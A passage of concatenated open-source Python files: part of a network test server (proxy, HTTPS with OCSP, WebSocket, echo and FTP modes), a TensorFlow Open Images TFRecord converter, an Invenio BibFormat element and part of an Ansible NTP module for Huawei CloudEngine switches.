        sock.send('%s\r\n' % header)
      sock.send('\r\n')
      self._start_read_write(sock)
    except Exception:
      self.send_response(500)
      self.end_headers()
    finally:
      if sock is not None:
        sock.close()

  def do_CONNECT(self):
    """Handles CONNECT by tunnelling bytes to the host:port in the request."""
    try:
      pos = self.path.rfind(':')
      host = self.path[:pos]
      port = int(self.path[pos+1:])
    except Exception:
      self.send_response(400)
      self.end_headers()
      # BUG FIX: execution previously fell through to the connection
      # attempt below with |host|/|port| unbound, raising NameError.
      return

    sock = None
    try:
      sock = socket.create_connection((host, port))
      self.send_response(200, 'Connection established')
      self.end_headers()
      self._start_read_write(sock)
    except Exception:
      self.send_response(500)
      self.end_headers()
    finally:
      # BUG FIX: |sock| was unbound (NameError) when create_connection
      # itself raised; only close a socket that was actually created.
      if sock is not None:
        sock.close()

  def do_GET(self):
    self._do_common_method()

  def do_HEAD(self):
    self._do_common_method()
class ServerRunner(testserver_base.TestServerRunner):
"""TestServerRunner for the net test servers."""
def __init__(self):
super(ServerRunner, self).__init__()
self.__ocsp_server = None
def __make_data_dir(self):
if self.options.data_dir:
if not os.path.isdir(self.options.data_dir):
raise testserver_base.OptionError('specified data dir not found: ' +
self.options.data_dir + ' exiting...')
my_data_dir = self.options.data_dir
else:
# Create the default path to our data dir, relative to the exe dir.
my_data_dir = os.path.join(BASE_DIR, "..", "..", "..", "..",
"test", "data")
#TODO(ibrar): Must use Find* funtion defined in google\tools
#i.e my_data_dir = FindUpward(my_data_dir, "test", "data")
return my_data_dir
def create_server(self, server_data):
port = self.options.port
host = self.options.host
if self.options.server_type == SERVER_HTTP:
if self.options.https:
pem_cert_and_key = None
if self.options.cert_and_key_file:
if not os.path.isfile(self.options.cert_and_key_file):
raise testserver_base.OptionError(
'specified server cert file not found: ' +
self.options.cert_and_key_file + ' exiting...')
pem_cert_and_key = file(self.options.cert_and_key_file, 'r').read()
else:
# generate a new certificate and run an OCSP server for it.
self.__ocsp_server = OCSPServer((host, 0), OCSPHandler)
print ('OCSP server started on %s:%d...' %
(host, self.__ocsp_server.server_port))
ocsp_der = None
ocsp_state = None
if self.options.ocsp == 'ok':
ocsp_state = minica.OCSP_STATE_GOOD
elif self.options.ocsp == 'revoked':
ocsp_state = minica.OCSP_STATE_REVOKED
elif self.options.ocsp == 'invalid':
ocsp_state = minica.OCSP_STATE_INVALID
elif self.options.ocsp == 'unauthorized':
ocsp_state = minica.OCSP_STATE_UNAUTHORIZED
elif self.options.ocsp == 'unknown':
ocsp_state = minica.OCSP_STATE_UNKNOWN
else:
raise testserver_base.OptionError('unknown OCSP status: ' +
self.options.ocsp_status)
(pem_cert_and_key, ocsp_der) = minica.GenerateCertKeyAndOCSP(
subject = "127.0.0.1",
ocsp_url = ("http://%s:%d/ocsp" %
(host, self.__ocsp_server.server_port)),
ocsp_state = ocsp_state,
serial = self.options.cert_serial)
self.__ocsp_server.ocsp_response = ocsp_der
for ca_cert in self.options.ssl_client_ca:
if not os.path.isfile(ca_cert):
raise testserver_base.OptionError(
'specified trusted client CA file not found: ' + ca_cert +
' exiting...')
server = HTTPSServer((host, port), TestPageHandler, pem_cert_and_key,
self.options.ssl_client_auth,
self.options.ssl_client_ca,
self.options.ssl_bulk_cipher,
self.options.record_resume,
self.options.tls_intolerant)
print 'HTTPS server started on %s:%d...' % (host, server.server_port)
else:
server = HTTPServer((host, port), TestPageHandler)
print 'HTTP server started on %s:%d...' % (host, server.server_port)
server.data_dir = self.__make_data_dir()
server.file_root_url = self.options.file_root_url
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_WEBSOCKET:
# Launch pywebsocket via WebSocketServer.
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler())
# TODO(toyoshim): Remove following os.chdir. Currently this operation
# is required to work correctly. It should be fixed from pywebsocket side.
os.chdir(self.__make_data_dir())
websocket_options = WebSocketOptions(host, port, '.')
if self.options.cert_and_key_file:
websocket_options.use_tls = True
websocket_options.private_key = self.options.cert_and_key_file
websocket_options.certificate = self.options.cert_and_key_file
if self.options.ssl_client_auth:
websocket_options.tls_client_auth = True
if len(self.options.ssl_client_ca) != 1:
raise testserver_base.OptionError(
'one trusted client CA file should be specified')
if not os.path.isfile(self.options.ssl_client_ca[0]):
raise testserver_base.OptionError(
'specified trusted client CA file not found: ' +
self.options.ssl_client_ca[0] + ' exiting...')
websocket_options.tls_client_ca = self.options.ssl_client_ca[0]
server = WebSocketServer(websocket_options)
print 'WebSocket server started on %s:%d...' % (host, server.server_port)
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_TCP_ECHO:
# Used for generating the key (randomly) that encodes the "echo request"
# message.
random.seed()
server = TCPEchoServer((host, port), TCPEchoHandler)
print 'Echo TCP server started on port %d...' % server.server_port
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_UDP_ECHO:
# Used for generating the key (randomly) that encodes the "echo request"
# message.
random.seed()
server = UDPEchoServer((host, port), UDPEchoHandler)
print 'Echo UDP server started on port %d...' % server.server_port
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_BASIC_AUTH_PROXY:
server = HTTPServer((host, port), BasicAuthProxyRequestHandler)
print 'BasicAuthProxy server started on port %d...' % server.server_port
server_data['port'] = server.server_port
elif self.options.server_type == SERVER_FTP:
my_data_dir = self.__make_data_dir()
# Instantiate a dummy authorizer for managing 'virtual' users
authorizer = pyftpdlib.ftpserver.DummyAuthorizer()
# Define a new user having full r/w permissions and a read-only
# anonymous user
authorizer.add_user('chrome', 'chrome', my_data_dir, perm='elradfmw')
authorizer.add_anonymous(my_data_dir)
# Instantiate FTP handler class
ftp_handler = pyftpdlib.ftpserver.FTPHandler
ftp_handler.authorizer = authorizer
# Define a customized banner (string returned when client connects)
ftp_handler.banner = ("pyftpdlib %s based ftpd ready." %
pyftpdlib.ftpserver.__ver__)
# Instantiate FTP server class and listen to address:port
server = pyftpdlib.ftpserver.FTPServer((host, port), ftp_handler)
server_data['port'] = server.socket.getsockname()[1]
print 'FTP server started on port %d...' % server_data['port']
else:
raise testserver_base.OptionError('unknown server type' +
self.options.server_type)
return server
def run_server(self):
if self.__ocsp_server:
self.__ocsp_server.serve_forever_on_thread()
testserver_base.TestServerRunner.run_server(self)
if self.__ocsp_server:
self.__ocsp_server.stop_serving()
def add_options(self):
testserver_base.TestServerRunner.add_options(self)
self.option_parser.add_option('-f', '--ftp', action='store_const',
const=SERVER_FTP, default=SERVER_HTTP,
dest='server_type',
help='start up an FTP server.')
self.option_parser.add_option('--tcp-echo', action='store_const',
const=SERVER_TCP_ECHO, default=SERVER_HTTP,
dest='server_type',
help='start up a tcp echo server.')
self.option_parser.add_option('--udp-echo', action='store_const',
const=SERVER_UDP_ECHO, default=SERVER_HTTP,
dest='server_type',
help='start up a udp echo server.')
self.option_parser.add_option('--basic-auth-proxy', action='store_const',
const=SERVER_BASIC_AUTH_PROXY,
default=SERVER_HTTP, dest='server_type',
help='start up a proxy server which requires '
'basic authentication.')
self.option_parser.add_option('--websocket', action='store_const',
const=SERVER_WEBSOCKET, default=SERVER_HTTP,
dest='server_type',
help='start up a WebSocket server.')
self.option_parser.add_option('--https', action='store_true',
dest='https', help='Specify that https '
'should be used.')
self.option_parser.add_option('--cert-and-key-file',
dest='cert_and_key_file', help='specify the '
'path to the file containing the certificate '
'and private key for the server in PEM '
'format')
self.option_parser.add_option('--ocsp', dest='ocsp', default='ok',
help='The type of OCSP response generated '
'for the automatically generated '
'certificate. One of [ok,revoked,invalid]')
self.option_parser.add_option('--cert-serial', dest='cert_serial',
default=0, type=int,
help='If non-zero then the generated '
'certificate will have this serial number')
self.option_parser.add_option('--tls-intolerant', dest='tls_intolerant',
default='0', type='int',
help='If nonzero, certain TLS connections '
'will be aborted in order to test version '
'fallback. 1 means all TLS versions will be '
'aborted. 2 means TLS 1.1 or higher will be '
'aborted. 3 means TLS 1.2 or higher will be '
'aborted.')
self.option_parser.add_option('--https-record-resume',
dest='record_resume', const=True,
default=False, action='store_const',
help='Record resumption cache events rather '
'than resuming as normal. Allows the use of '
'the /ssl-session-cache request')
self.option_parser.add_option('--ssl-client-auth', action='store_true',
help='Require SSL client auth on every '
'connection.')
self.option_parser.add_option('--ssl-client-ca', action='append',
default=[], help='Specify that the client '
'certificate request should include the CA '
'named in the subject of the DER-encoded '
'certificate contained in the specified '
'file. This option may appear multiple '
'times, indicating multiple CA names should '
'be sent in the request.')
self.option_parser.add_option('--ssl-bulk-cipher', action='append',
help='Specify the bulk encryption '
'algorithm(s) that will be accepted by the '
'SSL server. Valid values are "aes256", '
'"aes128", "3des", "rc4". If omitted, all '
'algorithms will be used. This option may '
'appear multiple times, indicating '
'multiple algorithms should be enabled.');
self.option_parser.add_option('--file-root-url', default='/files/',
help='Specify a root URL for files served.')
# Script entry point: run the requested test server until terminated,
# propagating the runner's exit status to the shell.
if __name__ == '__main__':
  sys.exit(ServerRunner().main())
| bsd-3-clause |
alexgorban/models | research/object_detection/dataset_tools/create_oid_tf_record.py | 3 | 5198 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
r"""Creates TFRecords of Open Images dataset for object detection.
Example usage:
python object_detection/dataset_tools/create_oid_tf_record.py \
--input_box_annotations_csv=/path/to/input/annotations-human-bbox.csv \
--input_image_label_annotations_csv=/path/to/input/annotations-label.csv \
--input_images_directory=/path/to/input/image_pixels_directory \
--input_label_map=/path/to/input/labels_bbox_545.labelmap \
--output_tf_record_path_prefix=/path/to/output/prefix.tfrecord
CSVs with bounding box annotations and image metadata (including the image URLs)
can be downloaded from the Open Images GitHub repository:
https://github.com/openimages/dataset
This script will include every image found in the input_images_directory in the
output TFRecord, even if the image has no corresponding bounding box annotations
in the input_annotations_csv. If input_image_label_annotations_csv is specified,
it will add image-level labels as well. Note that the information of whether a
label is positivelly or negativelly verified is NOT added to tfrecord.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import contextlib2
import pandas as pd
import tensorflow as tf
from object_detection.dataset_tools import oid_tfrecord_creation
from object_detection.dataset_tools import tf_record_creation_util
from object_detection.utils import label_map_util
# Command-line flags: the input annotation CSVs, the directory of JPEG
# images, the label map, and the sharded output TFRecord path prefix.
tf.flags.DEFINE_string('input_box_annotations_csv', None,
                       'Path to CSV containing image bounding box annotations')
tf.flags.DEFINE_string('input_images_directory', None,
                       'Directory containing the image pixels '
                       'downloaded from the OpenImages GitHub repository.')
tf.flags.DEFINE_string('input_image_label_annotations_csv', None,
                       'Path to CSV containing image-level labels annotations')
tf.flags.DEFINE_string('input_label_map', None, 'Path to the label map proto')
tf.flags.DEFINE_string(
    'output_tf_record_path_prefix', None,
    'Path to the output TFRecord. The shard index and the number of shards '
    'will be appended for each output shard.')
tf.flags.DEFINE_integer('num_shards', 100, 'Number of TFRecord shards')

FLAGS = tf.flags.FLAGS
def main(_):
  """Converts Open Images annotations plus image files into TFRecord shards.

  Reads bounding-box (and optionally image-level label) CSVs, joins them
  with every .jpg found in the images directory, and writes one
  tf.Example per image into FLAGS.num_shards output shards. The shard for
  an image is chosen from its hexadecimal image ID.

  Raises:
    ValueError: if any required flag is missing.
  """
  tf.logging.set_verbosity(tf.logging.INFO)

  required_flags = [
      'input_box_annotations_csv', 'input_images_directory', 'input_label_map',
      'output_tf_record_path_prefix'
  ]
  for flag_name in required_flags:
    if not getattr(FLAGS, flag_name):
      raise ValueError('Flag --{} is required'.format(flag_name))

  label_map = label_map_util.get_label_map_dict(FLAGS.input_label_map)
  all_box_annotations = pd.read_csv(FLAGS.input_box_annotations_csv)
  if FLAGS.input_image_label_annotations_csv:
    all_label_annotations = pd.read_csv(FLAGS.input_image_label_annotations_csv)
    # Rename to avoid clashing with the box-level 'Confidence' column.
    all_label_annotations.rename(
        columns={'Confidence': 'ConfidenceImageLabel'}, inplace=True)
  else:
    all_label_annotations = None
  all_images = tf.gfile.Glob(
      os.path.join(FLAGS.input_images_directory, '*.jpg'))
  all_image_ids = [os.path.splitext(os.path.basename(v))[0] for v in all_images]
  all_image_ids = pd.DataFrame({'ImageID': all_image_ids})
  # Concatenating the bare image-ID frame guarantees that every image on
  # disk appears in the output, even with no annotations.
  all_annotations = pd.concat(
      [all_box_annotations, all_image_ids, all_label_annotations])

  tf.logging.log(tf.logging.INFO, 'Found %d images...', len(all_image_ids))

  with contextlib2.ExitStack() as tf_record_close_stack:
    output_tfrecords = tf_record_creation_util.open_sharded_output_tfrecords(
        tf_record_close_stack, FLAGS.output_tf_record_path_prefix,
        FLAGS.num_shards)

    for counter, image_data in enumerate(all_annotations.groupby('ImageID')):
      tf.logging.log_every_n(tf.logging.INFO, 'Processed %d images...', 1000,
                             counter)

      image_id, image_annotations = image_data
      # In OID image file names are formed by appending ".jpg" to the image ID.
      image_path = os.path.join(FLAGS.input_images_directory, image_id + '.jpg')
      # BUG FIX: open the JPEG in binary mode ('rb'); the previous default
      # text mode can corrupt image bytes on platforms/Python versions
      # that perform newline translation or text decoding.
      with tf.gfile.Open(image_path, 'rb') as image_file:
        encoded_image = image_file.read()

      tf_example = oid_tfrecord_creation.tf_example_from_annotations_data_frame(
          image_annotations, label_map, encoded_image)
      if tf_example:
        shard_idx = int(image_id, 16) % FLAGS.num_shards
        output_tfrecords[shard_idx].write(tf_example.SerializeToString())
# Script entry point: tf.app.run parses the flags and invokes main().
if __name__ == '__main__':
  tf.app.run()
| apache-2.0 |
ksachs/invenio | modules/bibformat/lib/elements/bfe_collection.py | 30 | 1404 | # -*- coding: utf-8 -*-
##
## This file is part of Invenio.
## Copyright (C) 2006, 2007, 2008, 2009, 2010, 2011, 2012 CERN.
##
## Invenio is free software; you can redistribute it and/or
## modify it under the terms of the GNU General Public License as
## published by the Free Software Foundation; either version 2 of the
## License, or (at your option) any later version.
##
## Invenio is distributed in the hope that it will be useful, but
## WITHOUT ANY WARRANTY; without even the implied warranty of
## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
## General Public License for more details.
##
## You should have received a copy of the GNU General Public License
## along with Invenio; if not, write to the Free Software Foundation, Inc.,
## 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""BibFormat element - Prints collection identifier
"""
__revision__ = "$Id$"
def format_element(bfo, kb):
    """
    Prints the collection identifier.

    Translate using given knowledge base.

    @param kb: a knowledge base use to translate the collection identifier
    """
    # Return the first 980__a identifier the knowledge base can translate;
    # fall back to an empty string when none of them translates.
    for identifier in bfo.fields("980__a"):
        translated = bfo.kb(kb, identifier)
        if translated:
            return translated
    return ''
| gpl-2.0 |
onitake/ansible | lib/ansible/modules/network/cloudengine/ce_ntp.py | 7 | 20797 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Ansible module metadata: 'preview' maturity, maintained by the community.
ANSIBLE_METADATA = {'metadata_version': '1.1',
                    'status': ['preview'],
                    'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ce_ntp
version_added: "2.4"
short_description: Manages core NTP configuration on HUAWEI CloudEngine switches.
description:
- Manages core NTP configuration on HUAWEI CloudEngine switches.
author:
- Zhijin Zhou (@QijunPan)
options:
server:
description:
- Network address of NTP server.
peer:
description:
- Network address of NTP peer.
key_id:
description:
- Authentication key identifier to use with given NTP server or peer.
is_preferred:
description:
- Makes given NTP server or peer the preferred NTP server or peer for the device.
choices: ['enable', 'disable']
vpn_name:
description:
- Makes the device communicate with the given
NTP server or peer over a specific vpn.
default: '_public_'
source_int:
description:
- Local source interface from which NTP messages are sent.
Must be fully qualified interface name, i.e. C(40GE1/0/22), C(vlanif10).
Interface types, such as C(10GE), C(40GE), C(100GE), C(Eth-Trunk), C(LoopBack),
C(MEth), C(NULL), C(Tunnel), C(Vlanif).
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
- name: NTP test
hosts: cloudengine
connection: local
gather_facts: no
vars:
cli:
host: "{{ inventory_hostname }}"
port: "{{ ansible_ssh_port }}"
username: "{{ username }}"
password: "{{ password }}"
transport: cli
tasks:
- name: "Set NTP Server with parameters"
ce_ntp:
server: 192.8.2.6
vpn_name: js
source_int: vlanif4001
is_preferred: enable
key_id: 32
provider: "{{ cli }}"
- name: "Set NTP Peer with parameters"
ce_ntp:
peer: 192.8.2.6
vpn_name: js
source_int: vlanif4001
is_preferred: enable
key_id: 32
provider: "{{ cli }}"
'''
RETURN = '''
proposed:
description: k/v pairs of parameters passed into module
returned: always
type: dict
sample: {"server": "2.2.2.2", "key_id": "48",
"is_preferred": "enable", "vpn_name":"js",
"source_int": "vlanif4002", "state":"present"}
existing:
description: k/v pairs of existing ntp server/peer
returned: always
type: dict
sample: {"server": "2.2.2.2", "key_id": "32",
"is_preferred": "disable", "vpn_name":"js",
"source_int": "vlanif4002"}
end_state:
description: k/v pairs of ntp info after module execution
returned: always
type: dict
sample: {"server": "2.2.2.2", "key_id": "48",
"is_preferred": "enable", "vpn_name":"js",
"source_int": "vlanif4002"}
updates:
description: command sent to the device
returned: always
type: list
sample: ["ntp server 2.2.2.2 authentication-keyid 48 source-interface vlanif4002 vpn-instance js preferred"]
changed:
description: check to see if a change was made on the device
returned: always
type: boolean
sample: true
'''
import re
from xml.etree import ElementTree
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.network.cloudengine.ce import ce_argument_spec, get_nc_config, set_nc_config
CE_NC_GET_NTP_CONFIG = """
<filter type="subtree">
<ntp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<ntpUCastCfgs>
<ntpUCastCfg>
<addrFamily></addrFamily>
<vpnName></vpnName>
<ifName></ifName>
<ipv4Addr></ipv4Addr>
<ipv6Addr></ipv6Addr>
<type></type>
<isPreferred></isPreferred>
<keyId></keyId>
</ntpUCastCfg>
</ntpUCastCfgs>
</ntp>
</filter>
"""
CE_NC_MERGE_NTP_CONFIG = """
<config>
<ntp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<ntpUCastCfgs>
<ntpUCastCfg operation="merge">
<addrFamily>%s</addrFamily>
<ipv4Addr>%s</ipv4Addr>
<ipv6Addr>%s</ipv6Addr>
<type>%s</type>
<vpnName>%s</vpnName>
<keyId>%s</keyId>
<isPreferred>%s</isPreferred>
<ifName>%s</ifName>
<neid>0-0</neid>
</ntpUCastCfg>
</ntpUCastCfgs>
</ntp>
</config>
"""
CE_NC_DELETE_NTP_CONFIG = """
<config>
<ntp xmlns="http://www.huawei.com/netconf/vrp" content-version="1.0" format-version="1.0">
<ntpUCastCfgs>
<ntpUCastCfg operation="delete">
<addrFamily>%s</addrFamily>
<ipv4Addr>%s</ipv4Addr>
<ipv6Addr>%s</ipv6Addr>
<type>%s</type>
<vpnName>%s</vpnName>
<neid>0-0</neid>
</ntpUCastCfg>
</ntpUCastCfgs>
</ntp>
</config>
"""
def get_interface_type(interface):
    """Return the canonical lower-case type of an interface name.

    For example ``'40GE1/0/22'`` -> ``'40ge'`` and ``'Vlanif10'`` ->
    ``'vlanif'``.  Returns ``None`` when *interface* is ``None`` or its
    prefix is not recognised.
    """
    if interface is None:
        return None
    # Ordered (prefix, type) pairs; the first matching prefix wins,
    # mirroring the original elif chain (no prefix shadows another).
    prefix_to_type = (
        ('GE', 'ge'),
        ('10GE', '10ge'),
        ('25GE', '25ge'),
        ('4X10GE', '4x10ge'),
        ('40GE', '40ge'),
        ('100GE', '100ge'),
        ('VLANIF', 'vlanif'),
        ('LOOPBACK', 'loopback'),
        ('METH', 'meth'),
        ('ETH-TRUNK', 'eth-trunk'),
        ('VBDIF', 'vbdif'),
        ('NVE', 'nve'),
        ('TUNNEL', 'tunnel'),
        ('ETHERNET', 'ethernet'),
        ('FCOE-PORT', 'fcoe-port'),
        ('FABRIC-PORT', 'fabric-port'),
        ('STACK-PORT', 'stack-Port'),
        ('NULL', 'null'),
    )
    upper_name = interface.upper()
    for prefix, if_type in prefix_to_type:
        if upper_name.startswith(prefix):
            # Lower-casing here keeps parity with the original code,
            # which normalised e.g. 'stack-Port' to 'stack-port'.
            return if_type.lower()
    return None
class Ntp(object):
    """Manage NTP unicast server/peer configuration on a CloudEngine
    switch via NETCONF (merge/delete of ntpUCastCfg entries)."""
    def __init__(self, argument_spec):
        self.spec = argument_spec
        self.module = None
        self.mutually_exclusive = [('server', 'peer')]
        self.init_module()
        # NTP configuration info taken from the module parameters.
        self.server = self.module.params['server'] or None
        self.peer = self.module.params['peer'] or None
        self.key_id = self.module.params['key_id']
        self.is_preferred = self.module.params['is_preferred']
        self.vpn_name = self.module.params['vpn_name']
        self.interface = self.module.params['source_int'] or ""
        self.state = self.module.params['state']
        self.ntp_conf = dict()
        # True when the requested config already exists on the device,
        # in which case no change is pushed (see get_ntp_exist_config).
        self.conf_exsit = False
        # Address family; may be switched to 'IPv6' by
        # check_ipaddr_validate().
        self.ip_ver = 'IPv4'
        if self.server:
            self.peer_type = 'Server'
            self.address = self.server
        elif self.peer:
            self.peer_type = 'Peer'
            self.address = self.peer
        else:
            self.peer_type = None
            self.address = None
        self.check_params()
        # state
        self.changed = False
        self.updates_cmd = list()
        self.results = dict()
        self.proposed = dict()
        self.existing = list()
        self.end_state = list()
        self.init_data()
    def init_data(self):
        """Normalise optional parameters to the values the device expects."""
        if self.interface is not None:
            self.interface = self.interface.lower()
        if not self.key_id:
            self.key_id = ""
        if not self.is_preferred:
            self.is_preferred = 'disable'
    def init_module(self):
        """Create the AnsibleModule (exactly one of server/peer required)."""
        required_one_of = [("server", "peer")]
        self.module = AnsibleModule(
            argument_spec=self.spec,
            supports_check_mode=True,
            required_one_of=required_one_of,
            mutually_exclusive=self.mutually_exclusive
        )
    def check_ipaddr_validate(self):
        """Validate self.address and set self.ip_ver accordingly."""
        rule1 = r'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])\.'
        rule2 = r'(25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9]?[0-9])'
        ipv4_regex = '%s%s%s%s%s%s' % ('^', rule1, rule1, rule1, rule2, '$')
        # Only matches fully-expanded (8-group) IPv6 addresses.
        ipv6_regex = '^(?:[a-fA-F0-9]{1,4}:){7}[a-fA-F0-9]{1,4}$'
        flag = False
        if bool(re.match(ipv4_regex, self.address)):
            flag = True
            self.ip_ver = "IPv4"
            if not self.ntp_ucast_ipv4_validate():
                flag = False
        elif bool(re.match(ipv6_regex, self.address)):
            flag = True
            self.ip_ver = "IPv6"
        else:
            # NOTE(review): anything matching neither regex falls through
            # here and is accepted as IPv6 without validation.  That covers
            # compressed forms like '::1', but also arbitrary strings --
            # confirm this permissiveness is intended.
            flag = True
            self.ip_ver = "IPv6"
        if not flag:
            if self.peer_type == "Server":
                self.module.fail_json(msg='Error: Illegal server ip-address.')
            else:
                self.module.fail_json(msg='Error: Illegal peer ip-address.')
    def ntp_ucast_ipv4_validate(self):
        """Reject loopback/multicast/reserved/zero IPv4 addresses."""
        addr_list = re.findall(r'(.*)\.(.*)\.(.*)\.(.*)', self.address)
        if not addr_list:
            self.module.fail_json(msg='Error: Match ip-address fail.')
        # Pack the four octets into a single 32-bit integer.
        value = ((int(addr_list[0][0])) * 0x1000000) + (int(addr_list[0][1]) * 0x10000) + \
            (int(addr_list[0][2]) * 0x100) + (int(addr_list[0][3]))
        # NOTE(review): '&' binds looser than '==' in Python, so each masked
        # term evaluates as ``value & (mask == const)`` (i.e. ``value & bool``),
        # which is falsy for the intended masks; effectively only the
        # ``value == 0`` test can trigger.  Looks like a precedence bug --
        # the intent was ``(value & mask) == const``.
        if (value & (0xff000000) == 0x7f000000) or (value & (0xF0000000) == 0xF0000000) \
                or (value & (0xF0000000) == 0xE0000000) or (value == 0):
            return False
        return True
    def check_params(self):
        """Check all input params"""
        # check interface type
        if self.interface:
            intf_type = get_interface_type(self.interface)
            if not intf_type:
                self.module.fail_json(
                    msg='Error: Interface name of %s '
                        'is error.' % self.interface)
        if self.vpn_name:
            if (len(self.vpn_name) < 1) or (len(self.vpn_name) > 31):
                self.module.fail_json(
                    msg='Error: VPN name length is beetween 1 and 31.')
        if self.address:
            self.check_ipaddr_validate()
    def check_response(self, xml_str, xml_name):
        """Fail the module unless the NETCONF reply contains <ok/>."""
        if "<ok/>" not in xml_str:
            self.module.fail_json(msg='Error: %s failed.' % xml_name)
    def set_ntp(self, *args):
        """Push the NTP config to the device.

        For state 'present' args are (addr_family, address, peer_type,
        vpn_name, key_id, is_preferred, if_name); for 'absent' only the
        first five matter.  The unused address family slot is filled with
        a placeholder ('::' or '0.0.0.0').
        """
        if self.state == 'present':
            if self.ip_ver == 'IPv4':
                xml_str = CE_NC_MERGE_NTP_CONFIG % (
                    args[0], args[1], '::', args[2], args[3], args[4], args[5], args[6])
            elif self.ip_ver == 'IPv6':
                xml_str = CE_NC_MERGE_NTP_CONFIG % (
                    args[0], '0.0.0.0', args[1], args[2], args[3], args[4], args[5], args[6])
            ret_xml = set_nc_config(self.module, xml_str)
            self.check_response(ret_xml, "NTP_CORE_CONFIG")
        else:
            if self.ip_ver == 'IPv4':
                xml_str = CE_NC_DELETE_NTP_CONFIG % (
                    args[0], args[1], '::', args[2], args[3])
            elif self.ip_ver == 'IPv6':
                xml_str = CE_NC_DELETE_NTP_CONFIG % (
                    args[0], '0.0.0.0', args[1], args[2], args[3])
            ret_xml = set_nc_config(self.module, xml_str)
            self.check_response(ret_xml, "UNDO_NTP_CORE_CONFIG")
    def config_ntp(self):
        """Apply the requested state, skipping work when config already exists."""
        if self.state == "present":
            if self.address and not self.conf_exsit:
                if self.is_preferred == 'enable':
                    is_preferred = 'true'
                else:
                    is_preferred = 'false'
                self.set_ntp(self.ip_ver, self.address, self.peer_type,
                             self.vpn_name, self.key_id, is_preferred, self.interface)
                self.changed = True
        else:
            if self.address:
                self.set_ntp(self.ip_ver, self.address,
                             self.peer_type, self.vpn_name, '', '', '')
                self.changed = True
    def show_result(self):
        """Exit the module, reporting changed/proposed/existing/end state."""
        self.results['changed'] = self.changed
        self.results['proposed'] = self.proposed
        self.results['existing'] = self.existing
        self.results['end_state'] = self.end_state
        if self.changed:
            self.results['updates'] = self.updates_cmd
        else:
            self.results['updates'] = list()
        self.module.exit_json(**self.results)
    def get_ntp_exist_config(self):
        """Read the device's current NTP unicast config via NETCONF.

        Also sets self.conf_exsit when an entry exactly matching the
        requested config is found (state 'present' only).
        """
        ntp_config = list()
        conf_str = CE_NC_GET_NTP_CONFIG
        con_obj = get_nc_config(self.module, conf_str)
        if "<data/>" in con_obj:
            return ntp_config
        # Strip namespaces/newlines so plain tag paths work with ElementTree.
        xml_str = con_obj.replace('\r', '').replace('\n', '').\
            replace('xmlns="urn:ietf:params:xml:ns:netconf:base:1.0"', "").\
            replace('xmlns="http://www.huawei.com/netconf/vrp"', "")
        # get all ntp config info
        root = ElementTree.fromstring(xml_str)
        ntpsite = root.findall("data/ntp/ntpUCastCfgs/ntpUCastCfg")
        for nexthop in ntpsite:
            ntp_dict = dict()
            for ele in nexthop:
                if ele.tag in ["addrFamily", "vpnName", "ifName", "ipv4Addr",
                               "ipv6Addr", "type", "isPreferred", "keyId"]:
                    ntp_dict[ele.tag] = ele.text
            ip_addr = ntp_dict['ipv6Addr']
            if ntp_dict['addrFamily'] == "IPv4":
                ip_addr = ntp_dict['ipv4Addr']
            if ntp_dict['ifName'] is None:
                ntp_dict['ifName'] = ""
            if ntp_dict['isPreferred'] == 'true':
                is_preferred = 'enable'
            else:
                is_preferred = 'disable'
            if self.state == "present":
                key_id = ntp_dict['keyId'] or ""
                cur_ntp_cfg = dict(vpn_name=ntp_dict['vpnName'], source_int=ntp_dict['ifName'].lower(), address=ip_addr,
                                   peer_type=ntp_dict['type'], prefer=is_preferred, key_id=key_id)
                exp_ntp_cfg = dict(vpn_name=self.vpn_name, source_int=self.interface.lower(), address=self.address,
                                   peer_type=self.peer_type, prefer=self.is_preferred, key_id=self.key_id)
                if cur_ntp_cfg == exp_ntp_cfg:
                    self.conf_exsit = True
            vpn_name = ntp_dict['vpnName']
            if ntp_dict['vpnName'] == "_public_":
                vpn_name = None
            if_name = ntp_dict['ifName']
            if if_name == "":
                if_name = None
            if self.peer_type == 'Server':
                ntp_config.append(dict(vpn_name=vpn_name,
                                       source_int=if_name, server=ip_addr,
                                       is_preferred=is_preferred, key_id=ntp_dict['keyId']))
            else:
                ntp_config.append(dict(vpn_name=vpn_name,
                                       source_int=if_name, peer=ip_addr,
                                       is_preferred=is_preferred, key_id=ntp_dict['keyId']))
        return ntp_config
    def get_existing(self):
        """Get existing info"""
        if self.address:
            self.existing = self.get_ntp_exist_config()
    def get_proposed(self):
        """Build the 'proposed' result dict from the module parameters."""
        if self.address:
            vpn_name = self.vpn_name
            if vpn_name == "_public_":
                vpn_name = None
            if_name = self.interface
            if if_name == "":
                if_name = None
            key_id = self.key_id
            if key_id == "":
                key_id = None
            if self.peer_type == 'Server':
                self.proposed = dict(state=self.state, vpn_name=vpn_name,
